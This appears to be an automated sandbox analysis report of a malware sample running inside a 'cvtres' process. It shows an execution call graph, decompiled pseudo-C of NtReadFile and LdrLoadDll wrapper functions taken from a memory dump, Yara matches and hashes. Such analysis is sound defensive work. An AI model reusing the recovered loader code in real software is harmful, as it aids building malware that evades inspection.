                                                                        execution_graph 32773 41d480 32774 41d48b 32773->32774 32776 419be0 32773->32776 32777 419c06 32776->32777 32788 408b50 32777->32788 32779 419c12 32787 419c59 32779->32787 32796 40d160 32779->32796 32781 419c27 32782 419c3c 32781->32782 32844 418920 32781->32844 32808 40a600 32782->32808 32785 419c4b 32786 418920 2 API calls 32785->32786 32786->32787 32787->32774 32847 408aa0 32788->32847 32790 408b64 32790->32779 32791 408b5d 32791->32790 32859 408a40 32791->32859 32797 40d18c 32796->32797 33271 40a000 32797->33271 32799 40d19e 33275 40d070 32799->33275 32802 40d1d1 32804 40d1e2 32802->32804 32807 418700 2 API calls 32802->32807 32803 40d1b9 32805 40d1c4 32803->32805 32806 418700 2 API calls 32803->32806 32804->32781 32805->32781 32806->32805 32807->32804 32809 40a625 32808->32809 32810 40a000 LdrLoadDll 32809->32810 32811 40a67c 32810->32811 33294 409c80 32811->33294 32813 40a6a2 32843 40a8f3 32813->32843 33303 413390 32813->33303 32815 40a6e7 32815->32843 33306 4079d0 32815->33306 32817 40a72b 32817->32843 33313 418770 32817->33313 32821 40a781 32822 40a788 32821->32822 33325 418280 32821->33325 32824 41a090 2 API calls 32822->32824 32826 40a795 32824->32826 32826->32785 32827 40a7d2 32828 41a090 2 API calls 32827->32828 32829 40a7d9 32828->32829 32829->32785 32830 40a7e2 32831 40d1f0 3 API calls 32830->32831 32832 40a856 32831->32832 32832->32822 32833 40a861 32832->32833 32834 41a090 2 API calls 32833->32834 32835 40a885 32834->32835 33330 4182d0 32835->33330 32838 418280 2 API calls 32839 40a8c0 32838->32839 32839->32843 33335 418090 32839->33335 32842 418920 2 API calls 32842->32843 32843->32785 32845 41893f ExitProcess 32844->32845 32846 4191d0 LdrLoadDll 32844->32846 32846->32845 32878 416e40 32847->32878 32851 408ac6 32851->32791 32852 408abc 32852->32851 32885 419520 32852->32885 32854 408b03 32854->32851 32896 4088c0 32854->32896 32856 408b23 32902 408320 LdrLoadDll 32856->32902 32858 408b35 32858->32791 33246 419810 32859->33246 32862 419810 LdrLoadDll 32863 408a6b 32862->32863 32864 419810 LdrLoadDll 32863->32864 32865 408a81 32864->32865 32866 40cf60 32865->32866 32867 40cf79 32866->32867 33254 409e80 32867->33254 32869 40cf8c 33258 418450 32869->33258 32873 40cfb2 32876 40cfdd 32873->32876 33264 4184d0 32873->33264 32875 418700 2 API calls 32877 408b75 32875->32877 32876->32875 32877->32779 32879 416e4f 32878->32879 32903 413e40 32879->32903 32881 408ab3 32882 416cf0 32881->32882 32909 418870 32882->32909 32886 419539 32885->32886 32916 413a40 32886->32916 32888 419551 32889 41955a 32888->32889 32955 419360 32888->32955 32889->32854 32891 41956e 32891->32889 32973 418170 32891->32973 33224 406e20 32896->33224 32898 4088e1 32898->32856 32899 4088da 32899->32898 33237 4070e0 32899->33237 32902->32858 32904 413e5a 32903->32904 32907 413e4e 32903->32907 32904->32881 32906 413fac 32906->32881 32907->32904 32908 4142c0 LdrLoadDll 32907->32908 32908->32906 32911 416d05 32909->32911 32912 4191d0 32909->32912 32911->32852 32913 4191e0 32912->32913 32915 419202 32912->32915 32914 413e40 LdrLoadDll 32913->32914 32914->32915 32915->32911 32917 413d75 32916->32917 32919 413a54 32916->32919 32917->32888 32919->32917 32981 417ec0 32919->32981 32921 413b80 32985 4185d0 32921->32985 32922 413b63 33042 4186d0 LdrLoadDll 32922->33042 32925 413b6d 32925->32888 32926 413ba7 32927 41a090 2 API calls 32926->32927 32929 413bb3 32927->32929 32928 413d39 32931 418700 2 API calls 32928->32931 32929->32925 32929->32928 32930 413d4f 32929->32930 32935 413c42 32929->32935 33051 413780 LdrLoadDll NtReadFile NtClose 32930->33051 32932 413d40 32931->32932 32932->32888 32934 413d62 32934->32888 32936 413ca9 32935->32936 32938 413c51 32935->32938 32936->32928 32937 413cbc 32936->32937 33044 418550 32937->33044 32940 413c56 32938->32940 32941 413c6a 32938->32941 33043 413640 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk 32940->33043 32944 413c87 32941->32944 32945 413c6f 32941->32945 32944->32932 33000 413400 32944->33000 32988 4136e0 32945->32988 32947 413c60 32947->32888 32949 413d1c 33048 418700 32949->33048 32950 413c7d 32950->32888 32953 413c9f 32953->32888 32954 413d28 32954->32888 32956 419371 32955->32956 32957 419383 32956->32957 33069 41a010 32956->33069 32957->32891 32959 4193a4 33072 413050 32959->33072 32961 4193f0 32961->32891 32962 4193c7 32962->32961 32963 413050 3 API calls 32962->32963 32965 4193e9 32963->32965 32965->32961 33097 414380 32965->33097 32966 41947a 32967 41948a 32966->32967 33191 419170 LdrLoadDll 32966->33191 33107 418fe0 32967->33107 32970 4194b8 33186 418130 32970->33186 32974 4191d0 LdrLoadDll 32973->32974 32975 41818c 32974->32975 33218 55e967a 32975->33218 32976 4181a7 32978 41a090 32976->32978 33221 4188e0 32978->33221 32980 4195c9 32980->32854 32982 417eca 32981->32982 32983 4191d0 LdrLoadDll 32982->32983 32984 413b34 32983->32984 32984->32921 32984->32922 32984->32925 32986 4185ec NtCreateFile 32985->32986 32987 4191d0 LdrLoadDll 32985->32987 32986->32926 32987->32986 32989 4136fc 32988->32989 32990 418550 LdrLoadDll 32989->32990 32991 41371d 32990->32991 32992 413724 32991->32992 32993 413738 32991->32993 32995 418700 2 API calls 32992->32995 32994 418700 2 API calls 32993->32994 32997 413741 32994->32997 32996 41372d 32995->32996 32996->32950 33052 41a2a0 LdrLoadDll RtlAllocateHeap 32997->33052 32999 41374c 32999->32950 33001 41344b 33000->33001 33002 41347e 33000->33002 33004 418550 LdrLoadDll 33001->33004 33003 4135c9 33002->33003 33007 41349a 33002->33007 33005 418550 LdrLoadDll 33003->33005 33006 413466 33004->33006 33011 4135e4 33005->33011 33008 418700 2 API calls 33006->33008 33009 418550 LdrLoadDll 33007->33009 33010 41346f 33008->33010 33012 4134b5 33009->33012 33010->32953 33065 418590 LdrLoadDll 33011->33065 33014 4134d1 33012->33014 33015 4134bc 33012->33015 33018 4134d6 33014->33018 33019 4134ec 33014->33019 33017 418700 2 API calls 33015->33017 33016 41361e 33020 418700 2 API calls 33016->33020 33021 4134c5 33017->33021 33022 418700 2 API calls 33018->33022 33027 4134f1 33019->33027 33053 41a260 33019->33053 33023 413629 33020->33023 33021->32953 33024 4134df 33022->33024 33023->32953 33024->32953 33035 413503 33027->33035 33056 418680 33027->33056 33028 413557 33029 41356e 33028->33029 33064 418510 LdrLoadDll 33028->33064 33030 413575 33029->33030 33031 41358a 33029->33031 33033 418700 2 API calls 33030->33033 33034 418700 2 API calls 33031->33034 33033->33035 33036 413593 33034->33036 33035->32953 33037 4135bf 33036->33037 33059 419e60 33036->33059 33037->32953 33039 4135aa 33040 41a090 2 API calls 33039->33040 33041 4135b3 33040->33041 33041->32953 33042->32925 33043->32947 33045 4191d0 LdrLoadDll 33044->33045 33046 413d04 33045->33046 33047 418590 LdrLoadDll 33046->33047 33047->32949 33049 4191d0 LdrLoadDll 33048->33049 33050 41871c NtClose 33049->33050 33050->32954 33051->32934 33052->32999 33066 4188a0 33053->33066 33055 41a278 33055->33027 33057 41869c NtReadFile 33056->33057 33058 4191d0 LdrLoadDll 33056->33058 33057->33028 33058->33057 33060 419e84 33059->33060 33061 419e6d 33059->33061 33060->33039 33061->33060 33062 41a260 2 API calls 33061->33062 33063 419e9b 33062->33063 33063->33039 33064->33029 33065->33016 33067 4191d0 LdrLoadDll 33066->33067 33068 4188bc RtlAllocateHeap 33067->33068 33068->33055 33192 4187b0 33069->33192 33071 41a03d 33071->32959 33073 413061 33072->33073 33075 413069 33072->33075 33073->32962 33074 41333c 33074->32962 33075->33074 33195 41b240 33075->33195 33077 4130bd 33078 41b240 2 API calls 33077->33078 33082 4130c8 33078->33082 33079 413116 33081 41b240 2 API calls 33079->33081 33083 41312a 33081->33083 33082->33079 33200 41b2e0 33082->33200 33084 41b240 2 API calls 33083->33084 33086 41319d 33084->33086 33085 41b240 2 API calls 33094 4131e5 33085->33094 33086->33085 33088 413314 33207 41b2a0 LdrLoadDll RtlFreeHeap 33088->33207 33090 41331e 33208 41b2a0 LdrLoadDll RtlFreeHeap 33090->33208 33092 413328 33209 41b2a0 LdrLoadDll RtlFreeHeap 33092->33209 33206 41b2a0 LdrLoadDll RtlFreeHeap 33094->33206 33095 413332 33210 41b2a0 LdrLoadDll RtlFreeHeap 33095->33210 33098 414391 33097->33098 33099 413a40 8 API calls 33098->33099 33101 4143a7 33099->33101 33100 4143fa 33100->32966 33101->33100 33102 4143e2 33101->33102 33103 4143f5 33101->33103 33104 41a090 2 API calls 33102->33104 33105 41a090 2 API calls 33103->33105 33106 4143e7 33104->33106 33105->33100 33106->32966 33108 418ff4 33107->33108 33109 418ea0 LdrLoadDll 33107->33109 33211 418ea0 33108->33211 33109->33108 33112 418ea0 LdrLoadDll 33113 419006 33112->33113 33114 418ea0 LdrLoadDll 33113->33114 33115 41900f 33114->33115 33116 418ea0 LdrLoadDll 33115->33116 33117 419018 33116->33117 33118 418ea0 LdrLoadDll 33117->33118 33119 419021 33118->33119 33120 418ea0 LdrLoadDll 33119->33120 33121 41902d 33120->33121 33122 418ea0 LdrLoadDll 33121->33122 33123 419036 33122->33123 33124 418ea0 LdrLoadDll 33123->33124 33125 41903f 33124->33125 33126 418ea0 LdrLoadDll 33125->33126 33127 419048 33126->33127 33128 418ea0 LdrLoadDll 33127->33128 33129 419051 33128->33129 33130 418ea0 LdrLoadDll 33129->33130 33131 41905a 33130->33131 33132 418ea0 LdrLoadDll 33131->33132 33133 419066 33132->33133 33134 418ea0 LdrLoadDll 33133->33134 33135 41906f 33134->33135 33136 418ea0 LdrLoadDll 33135->33136 33137 419078 33136->33137 33138 418ea0 LdrLoadDll 33137->33138 33139 419081 33138->33139 33140 418ea0 LdrLoadDll 33139->33140 33141 41908a 33140->33141 33142 418ea0 LdrLoadDll 33141->33142 33143 419093 33142->33143 33144 418ea0 LdrLoadDll 33143->33144 33145 41909f 33144->33145 33146 418ea0 LdrLoadDll 33145->33146 33147 4190a8 33146->33147 33148 418ea0 LdrLoadDll 33147->33148 33149 4190b1 33148->33149 33150 418ea0 LdrLoadDll 33149->33150 33151 4190ba 33150->33151 33152 418ea0 LdrLoadDll 33151->33152 33153 4190c3 33152->33153 33154 418ea0 LdrLoadDll 33153->33154 33155 4190cc 33154->33155 33156 418ea0 LdrLoadDll 33155->33156 33157 4190d8 33156->33157 33158 418ea0 LdrLoadDll 33157->33158 33159 4190e1 33158->33159 33160 418ea0 LdrLoadDll 33159->33160 33161 4190ea 33160->33161 33162 418ea0 LdrLoadDll 33161->33162 33163 4190f3 33162->33163 33164 418ea0 LdrLoadDll 33163->33164 33165 4190fc 33164->33165 33166 418ea0 LdrLoadDll 33165->33166 33167 419105 33166->33167 33168 418ea0 LdrLoadDll 33167->33168 33169 419111 33168->33169 33170 418ea0 LdrLoadDll 33169->33170 33171 41911a 33170->33171 33172 418ea0 LdrLoadDll 33171->33172 33173 419123 33172->33173 33174 418ea0 LdrLoadDll 33173->33174 33175 41912c 33174->33175 33176 418ea0 LdrLoadDll 33175->33176 33177 419135 33176->33177 33178 418ea0 LdrLoadDll 33177->33178 33179 41913e 33178->33179 33180 418ea0 LdrLoadDll 33179->33180 33181 41914a 33180->33181 33182 418ea0 LdrLoadDll 33181->33182 33183 419153 33182->33183 33184 418ea0 LdrLoadDll 33183->33184 33185 41915c 33184->33185 33185->32970 33187 4191d0 LdrLoadDll 33186->33187 33188 41814c 33187->33188 33217 55e9860 LdrInitializeThunk 33188->33217 33189 418163 33189->32891 33191->32967 33193 4187cc NtAllocateVirtualMemory 33192->33193 33194 4191d0 LdrLoadDll 33192->33194 33193->33071 33194->33193 33196 41b250 33195->33196 33197 41b256 33195->33197 33196->33077 33198 41a260 2 API calls 33197->33198 33199 41b27c 33198->33199 33199->33077 33201 41b305 33200->33201 33202 41b33d 33200->33202 33203 41a260 2 API calls 33201->33203 33202->33082 33204 41b31a 33203->33204 33205 41a090 2 API calls 33204->33205 33205->33202 33206->33088 33207->33090 33208->33092 33209->33095 33210->33074 33212 418ebb 33211->33212 33213 413e40 LdrLoadDll 33212->33213 33214 418edb 33213->33214 33215 413e40 LdrLoadDll 33214->33215 33216 418f87 33214->33216 33215->33216 33216->33112 33217->33189 33219 55e968f LdrInitializeThunk 33218->33219 33220 55e9681 33218->33220 33219->32976 33220->32976 33222 4191d0 LdrLoadDll 33221->33222 33223 4188fc RtlFreeHeap 33222->33223 33223->32980 33225 406e30 33224->33225 33226 406e2b 33224->33226 33227 41a010 2 API calls 33225->33227 33226->32899 33233 406e55 33227->33233 33228 406eb8 33228->32899 33229 418130 2 API calls 33229->33233 33230 406ebe 33232 406ee4 33230->33232 33234 418830 2 API calls 33230->33234 33232->32899 33233->33228 33233->33229 33233->33230 33235 41a010 2 API calls 33233->33235 33240 418830 33233->33240 33236 406ed5 33234->33236 33235->33233 33236->32899 33238 4070fe 33237->33238 33239 418830 2 API calls 33237->33239 33238->32856 33239->33238 33241 4191d0 LdrLoadDll 33240->33241 33242 41884c 33241->33242 33245 55e96e0 LdrInitializeThunk 33242->33245 33243 418863 33243->33233 33245->33243 33247 419833 33246->33247 33250 409b30 33247->33250 33251 409b54 33250->33251 33252 409b90 LdrLoadDll 33251->33252 33253 408a5a 33251->33253 33252->33253 33253->32862 33255 409ea3 33254->33255 33257 409f20 33255->33257 33269 417f00 LdrLoadDll 33255->33269 33257->32869 33259 4191d0 LdrLoadDll 33258->33259 33260 40cf9b 33259->33260 33260->32877 33261 418a40 33260->33261 33262 4191d0 LdrLoadDll 33261->33262 33263 418a5f LookupPrivilegeValueW 33262->33263 33263->32873 33265 4184ec 33264->33265 33266 4191d0 LdrLoadDll 33264->33266 33270 55e9910 LdrInitializeThunk 33265->33270 33266->33265 33267 41850b 33267->32876 33269->33257 33270->33267 33272 40a027 33271->33272 33273 409e80 LdrLoadDll 33272->33273 33274 40a056 33273->33274 33274->32799 33276 40d08a 33275->33276 33284 40d140 33275->33284 33277 409e80 LdrLoadDll 33276->33277 33278 40d0ac 33277->33278 33285 4181b0 33278->33285 33280 40d0ee 33288 4181f0 33280->33288 33283 418700 2 API calls 33283->33284 33284->32802 33284->32803 33286 4191d0 LdrLoadDll 33285->33286 33287 4181cc 33286->33287 33287->33280 33289 41820c 33288->33289 33290 4191d0 LdrLoadDll 33288->33290 33293 55e9fe0 LdrInitializeThunk 33289->33293 33290->33289 33291 40d134 33291->33283 33293->33291 33295 409c91 33294->33295 33296 409c8d 33294->33296 33297 409cdc 33295->33297 33299 409caa 33295->33299 33296->32813 33341 417f40 LdrLoadDll 33297->33341 33340 417f40 LdrLoadDll 33299->33340 33300 409ced 33300->32813 33302 409ccc 33302->32813 33304 40d1f0 3 API calls 33303->33304 33305 4133b6 33304->33305 33305->32815 33342 407710 33306->33342 33309 407710 19 API calls 33310 4079fa 33309->33310 33312 407a0d 33310->33312 33360 40d460 10 API calls 33310->33360 33312->32817 33314 4191d0 LdrLoadDll 33313->33314 33315 41878c 33314->33315 33480 55e98f0 LdrInitializeThunk 33315->33480 33316 40a762 33318 40d1f0 33316->33318 33319 40d20d 33318->33319 33481 418230 33319->33481 33321 40d255 33321->32821 33323 418280 2 API calls 33324 40d27e 33323->33324 33324->32821 33326 4191d0 LdrLoadDll 33325->33326 33327 41829c 33326->33327 33488 55e9780 LdrInitializeThunk 33327->33488 33328 40a7c5 33328->32827 33328->32830 33331 4191d0 LdrLoadDll 33330->33331 33332 4182ec 33331->33332 33489 55e97a0 LdrInitializeThunk 33332->33489 33333 40a899 33333->32838 33336 4191d0 LdrLoadDll 33335->33336 33337 4180ac 33336->33337 33490 55e9a20 LdrInitializeThunk 33337->33490 33338 40a8ec 33338->32842 33340->33302 33341->33300 33343 406e20 4 API calls 33342->33343 33357 40772a 33342->33357 33343->33357 33344 4079b9 33344->33309 33344->33312 33345 4079af 33346 4070e0 2 API calls 33345->33346 33346->33344 33349 418170 2 API calls 33349->33357 33353 40a900 LdrLoadDll NtClose LdrInitializeThunk LdrInitializeThunk LdrInitializeThunk 33353->33357 33356 418090 2 API calls 33356->33357 33357->33344 33357->33345 33357->33349 33357->33353 33357->33356 33358 418700 LdrLoadDll NtClose 33357->33358 33361 417f80 33357->33361 33365 407540 33357->33365 33377 40d340 LdrLoadDll NtClose 33357->33377 33378 418000 LdrLoadDll 33357->33378 33379 418030 LdrLoadDll 33357->33379 33380 4180c0 LdrLoadDll 33357->33380 33381 407310 33357->33381 33397 405ea0 LdrLoadDll 33357->33397 33358->33357 33360->33312 33362 417f89 33361->33362 33363 4191d0 LdrLoadDll 33362->33363 33364 417f9c 33363->33364 33364->33357 33366 407556 33365->33366 33398 417af0 33366->33398 33368 4076e1 33368->33357 33369 40756f 33369->33368 33419 407120 33369->33419 33371 407655 33371->33368 33372 407310 11 API calls 33371->33372 33373 407683 33372->33373 33373->33368 33374 418170 2 API calls 33373->33374 33375 4076b8 33374->33375 33375->33368 33376 418770 2 API calls 33375->33376 33376->33368 33377->33357 33378->33357 33379->33357 33380->33357 33382 407339 33381->33382 33459 407280 33382->33459 33385 418770 2 API calls 33386 40734c 33385->33386 33386->33385 33387 4073d7 33386->33387 33389 4073d2 33386->33389 33467 40d3c0 33386->33467 33387->33357 33388 418700 2 API calls 33390 40740a 33388->33390 33389->33388 33390->33387 33391 417f80 LdrLoadDll 33390->33391 33392 40746f 33391->33392 33392->33387 33471 417fc0 33392->33471 33394 4074d3 33394->33387 33395 413a40 8 API calls 33394->33395 33396 407528 33395->33396 33396->33357 33397->33357 33399 41a260 2 API calls 33398->33399 33400 417b07 33399->33400 33426 408160 33400->33426 33402 417b22 33403 417b60 33402->33403 33404 417b49 33402->33404 33407 41a010 2 API calls 33403->33407 33405 41a090 2 API calls 33404->33405 33406 417b56 33405->33406 33406->33369 33408 417b9a 33407->33408 33409 41a010 2 API calls 33408->33409 33410 417bb3 33409->33410 33416 417e54 33410->33416 33432 41a050 33410->33432 33413 417e40 33414 41a090 2 API calls 33413->33414 33415 417e4a 33414->33415 33415->33369 33417 41a090 2 API calls 33416->33417 33418 417ea9 33417->33418 33418->33369 33420 40721f 33419->33420 33421 407135 33419->33421 33420->33371 33421->33420 33422 413a40 8 API calls 33421->33422 33423 4071a2 33422->33423 33424 41a090 2 API calls 33423->33424 33425 4071c9 33423->33425 33424->33425 33425->33371 33427 408185 33426->33427 33428 409b30 LdrLoadDll 33427->33428 33429 4081b8 33428->33429 33431 4081dd 33429->33431 33435 40b330 33429->33435 33431->33402 33453 4187f0 33432->33453 33436 40b35c 33435->33436 33437 418450 LdrLoadDll 33436->33437 33438 40b375 33437->33438 33439 40b37c 33438->33439 33446 418490 33438->33446 33439->33431 33443 40b3b7 33444 418700 2 API calls 33443->33444 33445 40b3da 33444->33445 33445->33431 33447 4184ac 33446->33447 33448 4191d0 LdrLoadDll 33446->33448 33452 55e9710 LdrInitializeThunk 33447->33452 33448->33447 33449 40b39f 33449->33439 33451 418a80 LdrLoadDll 33449->33451 33451->33443 33452->33449 33454 4191d0 LdrLoadDll 33453->33454 33455 41880c 33454->33455 33458 55e9a00 LdrInitializeThunk 33455->33458 33456 417e39 33456->33413 33456->33416 33458->33456 33460 407298 33459->33460 33461 409b30 LdrLoadDll 33460->33461 33462 4072b3 33461->33462 33463 413e40 LdrLoadDll 33462->33463 33464 4072c3 33463->33464 33465 4072cc PostThreadMessageW 33464->33465 33466 4072e0 33464->33466 33465->33466 33466->33386 33468 40d3d3 33467->33468 33474 418100 33468->33474 33472 4191d0 LdrLoadDll 33471->33472 33473 417fdc 33472->33473 33473->33394 33475 4191d0 LdrLoadDll 33474->33475 33476 41811c 33475->33476 33479 55e9840 LdrInitializeThunk 33476->33479 33477 40d3fe 33477->33386 33479->33477 33480->33316 33482 418246 33481->33482 33483 4191d0 LdrLoadDll 33482->33483 33484 41824c 33483->33484 33487 55e99a0 LdrInitializeThunk 33484->33487 33485 40d24e 33485->33321 33485->33323 33487->33485 33488->33328 33489->33333 33490->33338 33492 55e9540 LdrInitializeThunk

                                                                        Executed Functions

                                                                        Function 0041867A Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 37filenativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 0 41867a-4186c9 call 4191d0 NtReadFile
                                                                        C-Code - Quality: 37%
                                                                        			E0041867A(void* __edx, void* __edi, signed int __esi, intOrPtr _a3, char _a7, intOrPtr _a11, intOrPtr _a15, intOrPtr _a19, intOrPtr _a23, intOrPtr _a27, char _a31, intOrPtr _a35, char _a39) {
				void* _t24;
				intOrPtr* _t36;
				void* _t38;

				 *((intOrPtr*)(__edi + __esi * 8 - 0x74aa701c)) =  *((intOrPtr*)(__edi + __esi * 8 - 0x74aa701c)) + __edx;
				_t19 = _a3;
				_t36 = _a3 + 0xc48;
				E004191D0(__edi, _a3, _t36,  *((intOrPtr*)(_t19 + 0x10)), 0, 0x2a);
				_t10 =  &_a39; // 0x413a21
				_t12 =  &_a31; // 0x413d62
				_t18 =  &_a7; // 0x413d62
				_t24 =  *((intOrPtr*)( *_t36))( *_t18, _a11, _a15, _a19, _a23, _a27,  *_t12, _a35,  *_t10, __esi, _t38); // executed
				return _t24;
			}






                                                                        0x0041867b
                                                                        0x00418683
                                                                        0x0041868f
                                                                        0x00418697
                                                                        0x0041869c
                                                                        0x004186a2
                                                                        0x004186bd
                                                                        0x004186c5
                                                                        0x004186c9

                                                                        APIs
                                                                        • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID: !:A$b=A$b=A
                                                                        • API String ID: 2738559852-704622139
                                                                        • Opcode ID: 2689bdfc233189ef0e6b2ff6fa3c43122a97693a4e8a851d7985702370a063dc
                                                                        • Instruction ID: e049933846b7baa0a81b8becc7a14c211ae46a169d7c22c04aebed586678641c
                                                                        • Opcode Fuzzy Hash: 2689bdfc233189ef0e6b2ff6fa3c43122a97693a4e8a851d7985702370a063dc
                                                                        • Instruction Fuzzy Hash: 3CF0E2B6200208AFDB58CF89CC84EEB77A9AF8C354F058259BA0D97241D630E951CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00418680 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 36filenativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 3 418680-418696 4 41869c-4186c9 NtReadFile 3->4 5 418697 call 4191d0 3->5 5->4
                                                                        C-Code - Quality: 37%
                                                                        			E00418680(intOrPtr _a4, char _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, char _a32, intOrPtr _a36, char _a40) {
				void* _t18;
				void* _t27;
				intOrPtr* _t28;

				_t13 = _a4;
				_t28 = _a4 + 0xc48;
				E004191D0(_t27, _t13, _t28,  *((intOrPtr*)(_t13 + 0x10)), 0, 0x2a);
				_t4 =  &_a40; // 0x413a21
				_t6 =  &_a32; // 0x413d62
				_t12 =  &_a8; // 0x413d62
				_t18 =  *((intOrPtr*)( *_t28))( *_t12, _a12, _a16, _a20, _a24, _a28,  *_t6, _a36,  *_t4); // executed
				return _t18;
			}






                                                                        0x00418683
                                                                        0x0041868f
                                                                        0x00418697
                                                                        0x0041869c
                                                                        0x004186a2
                                                                        0x004186bd
                                                                        0x004186c5
                                                                        0x004186c9

                                                                        APIs
                                                                        • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID: !:A$b=A$b=A
                                                                        • API String ID: 2738559852-704622139
                                                                        • Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                        • Instruction ID: 874bcf4b7b7dc579eb38d677a367109795b50ef5d252fa6d0d10ea1312fea5a1
                                                                        • Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
                                                                        • Instruction Fuzzy Hash: E3F0A4B2200208ABDB18DF89DC95EEB77ADAF8C754F158249BE1D97241D630E851CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004186CB Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 34filenativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 6 4186cb-4186cd 8 41869c-4186c9 NtReadFile 6->8 9 418697 call 4191d0 6->9 9->8
                                                                        APIs
                                                                        • NtReadFile.NTDLL(b=A,5E972F65,FFFFFFFF,?,?,?,b=A,?,!:A,FFFFFFFF,5E972F65,00413D62,?,00000000), ref: 004186C5
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID: !:A$b=A$b=A
                                                                        • API String ID: 2738559852-704622139
                                                                        • Opcode ID: 3f5d2cba6ae048b50a1a0119b45b097e2ddc11c28f82db590389e802fd9f19e6
                                                                        • Instruction ID: 0c69b3ad37953dfd000ced9b389c5dbe2c51f492ee365e04a20303b5ce730023
                                                                        • Opcode Fuzzy Hash: 3f5d2cba6ae048b50a1a0119b45b097e2ddc11c28f82db590389e802fd9f19e6
                                                                        • Instruction Fuzzy Hash: 77F0B7B6204149AFCB04DF99DC94DEB77A9AF8C318B19864DFA4D93601C634E851CBA4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00409B30 Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 262 409b30-409b59 call 41af60 265 409b5b-409b5e 262->265 266 409b5f-409b6d call 41b380 262->266 269 409b7d-409b8e call 419710 266->269 270 409b6f-409b7a call 41b600 266->270 275 409b90-409ba4 LdrLoadDll 269->275 276 409ba7-409baa 269->276 270->269 275->276
                                                                        C-Code - Quality: 100%
                                                                        			E00409B30(void* __eflags, void* _a4, intOrPtr _a8) {
				char* _v8;
				struct _EXCEPTION_RECORD _v12;
				struct _OBJDIR_INFORMATION _v16;
				char _v536;
				void* _t15;
				struct _OBJDIR_INFORMATION _t17;
				struct _OBJDIR_INFORMATION _t18;
				void* _t30;
				void* _t31;
				void* _t32;

				_v8 =  &_v536;
				_t15 = E0041AF60( &_v12, 0x104, _a8);
				_t31 = _t30 + 0xc;
				if(_t15 != 0) {
					_t17 = E0041B380(__eflags, _v8);
					_t32 = _t31 + 4;
					__eflags = _t17;
					if(_t17 != 0) {
						E0041B600( &_v12, 0);
						_t32 = _t32 + 8;
					}
					_t18 = E00419710(_v8);
					_v16 = _t18;
					__eflags = _t18;
					if(_t18 == 0) {
						LdrLoadDll(0, 0,  &_v12,  &_v16); // executed
						return _v16;
					}
					return _t18;
				} else {
					return _t15;
				}
			}













                                                                        0x00409b4c
                                                                        0x00409b4f
                                                                        0x00409b54
                                                                        0x00409b59
                                                                        0x00409b63
                                                                        0x00409b68
                                                                        0x00409b6b
                                                                        0x00409b6d
                                                                        0x00409b75
                                                                        0x00409b7a
                                                                        0x00409b7a
                                                                        0x00409b81
                                                                        0x00409b89
                                                                        0x00409b8c
                                                                        0x00409b8e
                                                                        0x00409ba2
                                                                        0x00000000
                                                                        0x00409ba4
                                                                        0x00409baa
                                                                        0x00409b5e
                                                                        0x00409b5e
                                                                        0x00409b5e

                                                                        APIs
                                                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00409BA2
                                                                        Memory Dump Source
                                                                        • Source File: 00000003.00000002.505503690.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_3_2_400000_cvtres.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: Load
                                                                        • String ID:
                                                                        • API String ID: 2234796835-0
                                                                        • Opcode ID: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                        • Instruction ID: b92050b7f429726503c7e4e061a3d159fecf728551aa670371b369b3bbcc7e54
                                                                        • Opcode Fuzzy Hash: 2b74e1a6cb83c5850b3107d2340027d2c92311fd596683a21eeb75245e32f392
                                                                        • Instruction Fuzzy Hash: 800112B5D4010DA7DB10DAA5DC42FDEB378AB54308F0041A5E918A7281F675EB54C795
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

